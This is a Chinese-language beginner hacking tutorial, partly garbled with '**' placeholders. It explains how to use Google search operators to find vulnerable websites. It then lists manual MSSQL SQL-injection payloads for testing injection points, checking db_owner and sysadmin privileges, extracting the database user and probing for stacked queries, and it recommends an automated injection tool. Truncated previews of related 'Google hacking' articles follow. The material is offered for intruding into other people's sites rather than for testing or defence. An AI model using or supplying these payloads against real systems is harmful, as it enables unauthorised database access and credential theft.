我們知道要入侵乙個有漏洞的**肯定要去尋找這個**怎麼找這樣的**呢
搜尋引擎高階語法
intitle: 搜尋網頁中的中的標題名中是否包含指定字
inurl 搜尋url**中包含的指點字串
filetype 搜尋特定檔案
site 搜尋特定區域名資訊
這些語法可用來搜尋你想要的**和**漏洞或者一些原始碼搭建**或者搜尋後台
開啟乙個**隨便開啟乙個網頁測試
sql注入最簡單的檢測漏洞
比如www.baidu.com後面輸入』www.baidu.com'
e/login.asp在**最後面輸入 一般都是返回正常
切記在**後面是要空格的 比如www.baidu.com and 1=1 這個空格表示是百分之二十
然後猜解使用者名稱和密碼
手工猜解
//看看是什麼許可權的
and 1=(select is_member('db_owner'))
and char(124)%2bcast(is_member('db_owner') as varchar(1))%2bchar(124)=1 ;--
//檢測是否有讀取某資料庫的許可權
and 1= (select has_dbaccess('master'))
and char(124)%2bcast(has_dbaccess('master') as varchar(1))%2bchar(124)=1 --
數字型別
and char(124)%2buser%2bchar(124)=0
字元型別
' and char(124)%2buser%2bchar(124)=0 and ''='
搜尋型別
' and char(124)%2buser%2bchar(124)=0 and '%'='
爆使用者名稱
and user>0
' and user>0 and ''='
檢測是否為sa許可權
and 1=(select is_srvrolemember('sysadmin'));--
and char(124)%2bcast(is_srvrolemember(0x730079007300610064006d0069006e00) as varchar(1))%2bchar(124)=1 --
檢測是不是mssql資料庫
and exists (select * from sysobjects);--
檢測是否支援多行
;declare @d int;--
或者工具
用啊d 啊d注入那輸入有漏洞的url 猜解
小白Google黑客語法
inurl 用於搜尋url中的關鍵字 site 用於收集子網域名稱 不要帶www intext 搜尋網頁正文部分的關鍵字 filetype 限制檔案字尾,拓展名或者 語言 intitle 搜尋標題部分的關鍵字 info 一些基本資訊 site 網域名稱 inurl login login admin...
google黑客語法總結
搜尋也是一門藝術 說起google,可謂無人不知無人不曉,其強大的搜尋功能,可以讓你在瞬間找到你想要的一切。不過對於普通的使用者而言,google是乙個強大的搜尋引擎 而對於黑客而言,則可能是一款絕佳的黑客工具。正因為google的檢索能力強大,黑客可以構造特殊的關鍵字語法,使用google搜尋網際...
google 黑客搜尋
使用google搜尋引擎可以讓普通人做一次黑客 google hacking 其原理也是很簡單,很多有特定漏洞的 都有類似的標誌頁面,而這些頁面如果被google索引到,我們就可以通過搜尋指定的單詞來找到某些有指定漏洞的 舉個例子來講,frontpage extensions是微軟iis上的乙個產品...